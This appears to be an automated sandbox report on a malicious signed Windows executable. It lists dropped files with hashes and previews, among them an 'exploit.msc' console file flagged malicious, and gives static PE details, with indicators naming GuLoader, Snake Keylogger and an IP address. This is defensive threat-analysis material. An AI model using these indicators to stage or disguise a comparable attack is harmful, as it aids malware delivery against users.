	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.84.99

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8008124196383991
Encrypted:	false
SSDEEP:	1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5Tq:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBfd
MD5:	DDA38A1A33FD89246FB7DC6E5A3D636A
SHA1:	2EDCF77F058674A029504C9CC6434DC3DF02AEAE
SHA-256:	C3ED272F9938571A05E551A89DD222DAF1A6A3E9749C079908D7372FEFBF3D71
SHA-512:	30165E5B498454E7CFA6AD478BD8B7793C984A4300CDD4E2BDAB7FF67D3F65BE81BCB39E7482BAE49BAEE443BE72D6586DEAD8631FEDAAB2A40429A6A3017504
Malicious:	false
Reputation:	low
Preview:	dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x65b45900, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7714989932598681
Encrypted:	false
SSDEEP:	1536:LSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:Laza9vqcHbrq2UyUVWlW
MD5:	BD6B16405DFB18009AB15DADD8E11CE9
SHA1:	143AB0AA8E5376BC85C35190D3ABEC411336312B
SHA-256:	F5F973FC9F72B0FBFFCFD4FA8CDB06832DE93214F5B99479F7463A3AFAA502C0
SHA-512:	F72AFBAB8F963B9D3741083BB53F23AA9C2195C95B39CA4CA5515CA76FBE5141FCE225D998FA06E71140A1DE75DEE6E821EE2893A5009039A2438F1643F80D47
Malicious:	false
Reputation:	low
Preview:	e.Y.... ...............X\...;...{......................0.p.....#....{..30...}..h.r.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......%9...{...............................................................................................................................................................................................2...{....................................)430...}.%................*.?.30...}...........................#......h.r.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.082224973540686
Encrypted:	false
SSDEEP:	3:ryKYehX7K8qrrvr+gvrr/3hAvYt/ollVmctlll/Sm1l1:ryKzhL1gn/RDALPPv
MD5:	E47BD3C8C31B60440151D062D20FD5D6
SHA1:	331D0503363BF0FF86B134BAF673DB59F0E2132C
SHA-256:	27E46E05A58C74970DF99537D2F44DC5A0CEBEDA1C396938AFC9605BF799D8C1
SHA-512:	2D971B2FA26E39B38878F8EE703BEF1682357B0A78B64486470369944C13C4E87F2513040C87233342D39C1F00B76E0AB5C8EFA3E19CF8CBA15BC2BACFB5987A
Malicious:	false
Reputation:	low
Preview:	OQM[.....................................;...{..30...}..#....{..........#....{..#....{...i..#....{.V................*.?.30...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\brave[1].htm

Download File

Process:	C:\Windows\System32\mmc.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2703
Entropy (8bit):	4.3702217153790475
Encrypted:	false
SSDEEP:	24:hPHCeHR1ixDQDOIpGbjFMi+A8jP+a4PK81rd6ZWC8U0aAua38U0aP3AZl38U0aLY:tEDG7y5j+bjt4PKid6AIA3vPuvXpq
MD5:	6F1C1470EAC15CECE324E2567ED9B8B0
SHA1:	9E701692EC9A22DC0C82B4513A01F96192D4D4FC
SHA-256:	5F423418371A271CBB774B78CE1CA75B0845B6B614DFD218B26D49898C791AC3
SHA-512:	7EF931E7ABC64D09B91B8CBA88E9B33D4B006117AF04396AED2A644F8CCA3C457CE2AF992D29C52486C572093B081C8AF6395DF390CCF0312BE2D9C0DBD7A1BB
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>..<html lang="ru">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Encrypthub LLC</title>.. <style>.. body {.. font-family: monospace;.. white-space: pre;.. background-color: #1e1e1e;.. color: white;.. text-align: center;.. padding: 20px;.. }.. </style>..</head>..<body>.. <pre>...................................................................................................................... _____ _ _ _ _ ____ _ _ . ..... \| ____\|_ __ ___ _ __ _ _ _ __ \| \|_\| \| \| \|_ _\| \|__ / ___\|\| \|_ ___

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulxmH/lZ:NllUg
MD5:	D904BDD752B6F23D81E93ECA3BD8E0F3
SHA1:	026D8B0D0F79861746760B0431AD46BAD2A01676
SHA-256:	B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
SHA-512:	5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................. ..............@..........

C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc

Download File

Process:	C:\Users\user\Desktop\IPt9U27NoX.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	148541
Entropy (8bit):	2.146341584940848
Encrypted:	false
SSDEEP:	768:gpwboYO7BgTNnvUQe3OJ/CQFPjrdnxFTB6Va928Yd:GfyrlPtntw
MD5:	56FA5C9AEF74520DEA4C439EF81C0F86
SHA1:	A3E90E38EDE7946BE892C3A84F2F56DB1F8E3FDD
SHA-256:	2740F00C8D9732B8AFAF2FF6B5325FDAA7D58AE0B72568C030076CE068C4D8F7
SHA-512:	5B897F50E9962D82C6F6419909E046068F98F2ABFD62F4965D61926F63E56DFA1B2C864C8510AC60A5EC83DA1C4C3B09651FE3C3793B81A5171FF2E1D7AFE8C9
Malicious:	true
Preview:	<?xml version="1.0"?><MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Author">.. <ConsoleFileID>{8172431C-597B-43F3-9EC8-50FED33B00E5}</ConsoleFileID>.. <FrameState ShowStatusBar="true">.. <WindowPlacement ShowCommand="SW_SHOWMINIMIZED">.. <Point Name="MinPosition" X="-1" Y="-1"/>.. <Point Name="MaxPosition" X="-1" Y="-1"/>.. <Rectangle Name="NormalPosition" Top="0" Bottom="614" Left="0" Right="1020"/>.. </WindowPlacement>.. </FrameState>.. <Views>.. <View ID="1" ScopePaneWidth="292" ActionsPaneWidth="-1">.. <BookMark Name="RootNode" NodeID="1"/>.. <BookMark Name="SelectedNode" NodeID="2"/>.. <WindowPlacement WPF_RESTORETOMAXIMIZED="true" ShowCommand="SW_SHOWMAXIMIZED">.. <Point Name="MinPosition" X="-1" Y="-1"/>.. <Point Name="MaxPosition" X="-8" Y="-31"/>.. <Rectangle Name="NormalPosition" Top="0" Bottom="436" Left="0" Right="1040"/>.. </WindowPlacement>.. <ViewOptions ViewMode="Report" ScopePaneVisible="true

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cj4i1hq.rfz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkqm54w2.olb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxor1bv1.cs5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgnkzgoa.5aj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7173096410178887
Encrypted:	false
SSDEEP:	96:YRQqC6WZ7okvhkvCCtl74rBWH3+4rBHH3N:YRfWR0l4V4X
MD5:	4A93023A60FC60E84EB0214F72808310
SHA1:	93CF05F76B8A4D3538EB4F789BAA61AE5001B41B
SHA-256:	D98DA2142A10C22498AE83E9163AC2E723603E73BBA67AFECDB63D995DE5311F
SHA-512:	FC774E762524C442FE36F7BB5221046498D7596C09724F20D396A6A7BAA66A1E03AFF4CC4130C62FA1161A8646D7956F25E0B6D8DE48233D2CDCE4A136BB9D92
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z.....".....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z....K.......W,.........t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.VmZ.N..........................B...A.p.p.D.a.t.a...B.V.1.....mZ.N..Roaming.@......EW.VmZ.N..........................D4..R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.VmZ.N..............................M.i.c.r.o.s.o.f.t.....V.1.....gZtn..Windows.@......EW.VmZ.N..........................wi..W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VmZ.N....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VmZ.N....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VgZ.m..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.VmZ.N................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z8X8HZSNH9UN9F2HCMUU.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7173096410178887
Encrypted:	false
SSDEEP:	96:YRQqC6WZ7okvhkvCCtl74rBWH3+4rBHH3N:YRfWR0l4V4X
MD5:	4A93023A60FC60E84EB0214F72808310
SHA1:	93CF05F76B8A4D3538EB4F789BAA61AE5001B41B
SHA-256:	D98DA2142A10C22498AE83E9163AC2E723603E73BBA67AFECDB63D995DE5311F
SHA-512:	FC774E762524C442FE36F7BB5221046498D7596C09724F20D396A6A7BAA66A1E03AFF4CC4130C62FA1161A8646D7956F25E0B6D8DE48233D2CDCE4A136BB9D92
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z.....".....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z....K.......W,.........t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.VmZ.N..........................B...A.p.p.D.a.t.a...B.V.1.....mZ.N..Roaming.@......EW.VmZ.N..........................D4..R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.VmZ.N..............................M.i.c.r.o.s.o.f.t.....V.1.....gZtn..Windows.@......EW.VmZ.N..........................wi..W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VmZ.N....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VmZ.N....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VgZ.m..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.VmZ.N................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.51302301948977
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IPt9U27NoX.exe
File size:	565'744 bytes
MD5:	7e287e5f835ef3b491383dd8626eead6
SHA1:	3a8a61f315d73a881a591f246fa8c12d594f9d53
SHA256:	eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833
SHA512:	dd57f3a7e827c32339f5ab8805cb0d9814bfbf538515e68c1456341d7fa2b3d31f33ecd20a8f1c78948a21d698e816a71fa7a1117842f7abfac8121a48156130
SSDEEP:	12288:LyveQB/fTHIGaPkKEYzURNAwbAgWfVzapB2ao:LuDXTIGaPhEYzUzA0WzapB2B
TLSH:	3AC47C0BE39604A8D072D538CE5A594FF3753C990732868F27A43D963F7B290BD2A391
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

File Icon


Icon Hash:	1770d46c6931130e

Static PE Info

General

Entrypoint:	0x140032ee0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66409723 [Sun May 12 10:17:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b1c5b1beabd90d9fdabd1df0779ea832

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	15/02/2025 07:08:43 11/02/2026 23:57:15
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization, CN=THE PACK (Shanghai) Corp., SERIALNUMBER=913100007862663014, O=THE PACK (Shanghai) Corp., L=Shanghai, C=CN
Version:	3
Thumbprint MD5:	CF2445C5DBB8213D9AD0EFF7841B15EC
Thumbprint SHA-1:	85F8A46CA3002846015A6D3048BB9058B844D63E
Thumbprint SHA-256:	A7B503FC0EE1D8BF32C4357316A899CC2FA5CF6F4B1B6817E9EC5CE404094B2E
Serial:	39D6C425AB7C43EA309C2D64F62E86D6

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F2CC8F5F118h
dec eax
add esp, 28h
jmp 00007F2CC8F5EAAFh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F2CC8F5DF33h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007F2CC8F5EC43h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007F2CC8F60C57h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F2CC8F4D4C3h
dec eax
lea edx, dword ptr [00025747h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F2CC8F5FD12h
int3
jmp 00007F2CC8F65EF4h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x597a0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x597d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x24688	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6a000	0x306c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x88408	0x1de8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x95000	0x970	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x536c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b3f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x588bc	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4676e	0x46800	f06bb06e02377ae8b223122e53be35c2	False	0.5372340425531915	data	6.47079645411382	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x128c4	0x12a00	2de06d4a6920a6911e64ff20000ea72f	False	0.4499003775167785	data	5.273999097784603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5b000	0xe75c	0x1a00	0dbdb901a7d477980097e42e511a94fb	False	0.28275240384615385	data	3.2571023907881185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6a000	0x306c	0x3200	b0ce0f057741ad2a4ef4717079fa34e9	False	0.483359375	data	5.501810413666288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6e000	0x360	0x400	1fcc7b1d7a02443319f8fcc2be4ca936	False	0.2578125	data	3.0459938492946015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6f000	0x15c	0x200	3f331ec50f09ba861beaf955b33712d5	False	0.408203125	data	3.3356393424384843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x24688	0x24800	6cb2b73756df7fa7f7e63211320adb1e	False	0.516193546660959	data	5.913884251041564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x95000	0x970	0xa00	77a9ddfc47a5650d6eebbcc823e39532	False	0.52421875	data	5.336289720085303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x70b0c	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced			1.0027729636048528
PNG	0x71654	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced			0.9363390441839495
RT_ICON	0x72c00	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.5965909090909091
RT_ICON	0x72cb0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0			0.5506756756756757
RT_ICON	0x72dd8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.4111271676300578
RT_ICON	0x73340	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.4111271676300578
RT_ICON	0x738a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0			0.49113475177304966
RT_ICON	0x73d10	0xf0	Device independent bitmap graphic, 24 x 48 x 1, image size 0			0.6375
RT_ICON	0x73e00	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 0			0.5204918032786885
RT_ICON	0x73fe8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0			0.5414746543778802
RT_ICON	0x746b0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0			0.5414746543778802
RT_ICON	0x74d78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0			0.3983606557377049
RT_ICON	0x75700	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.6677631578947368
RT_ICON	0x75830	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0			0.45564516129032256
RT_ICON	0x75b18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.5428700361010831
RT_ICON	0x763c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.5428700361010831
RT_ICON	0x76c68	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0			0.31355534709193245
RT_ICON	0x77d10	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.4681372549019608
RT_ICON	0x78040	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0			0.3676829268292683
RT_ICON	0x786a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.47707889125799574
RT_ICON	0x79550	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 0			0.2306434023991276
RT_ICON	0x7b1f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.25892116182572616
RT_ICON	0x7d7a0	0x430	Device independent bitmap graphic, 64 x 128 x 1, image size 0			0.4906716417910448
RT_ICON	0x7dbd0	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 0			0.3066816816816817
RT_ICON	0x7e638	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 0			0.3734132581100141
RT_ICON	0x7fc60	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 0			0.175
RT_ICON	0x82e88	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0			0.19195795937647614
RT_ICON	0x870b0	0x2024	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.0004861448711717
RT_ICON	0x890d4	0x2dca	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			1.0009384064152875
RT_ICON	0x8bea0	0x2f85	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9979449239621866
RT_ICON	0x8ee28	0x1381	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9347085920288404
RT_ICON	0x901ac	0x1904	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9326983135540288
RT_DIALOG	0x91ab0	0x2ba	data			0.5286532951289399
RT_DIALOG	0x91d6c	0x13a	data			0.6560509554140127
RT_DIALOG	0x91ea8	0xf2	data			0.71900826446281
RT_DIALOG	0x91f9c	0x14a	data			0.6
RT_DIALOG	0x920e8	0x314	data			0.47588832487309646
RT_DIALOG	0x923fc	0x24a	data			0.6279863481228669
RT_STRING	0x92648	0x1fc	data			0.421259842519685
RT_STRING	0x92844	0x246	data			0.41924398625429554
RT_STRING	0x92a8c	0x1a6	data			0.514218009478673
RT_STRING	0x92c34	0xdc	data			0.65
RT_STRING	0x92d10	0x470	data			0.3873239436619718
RT_STRING	0x93180	0x164	data			0.5056179775280899
RT_STRING	0x932e4	0x110	data			0.5772058823529411
RT_STRING	0x933f4	0x158	data			0.4563953488372093
RT_STRING	0x9354c	0xe8	data			0.5948275862068966
RT_STRING	0x93634	0x1c6	data			0.5242290748898678
RT_STRING	0x937fc	0x268	data			0.4837662337662338
RT_GROUP_ICON	0x93a64	0x1aa	data			0.5093896713615024
RT_VERSION	0x93c10	0x310	data	English	United States	0.4451530612244898
RT_MANIFEST	0x93f20	0x768	XML 1.0 document, ASCII text, with CRLF line terminators			0.40189873417721517

Imports

DLL	Import
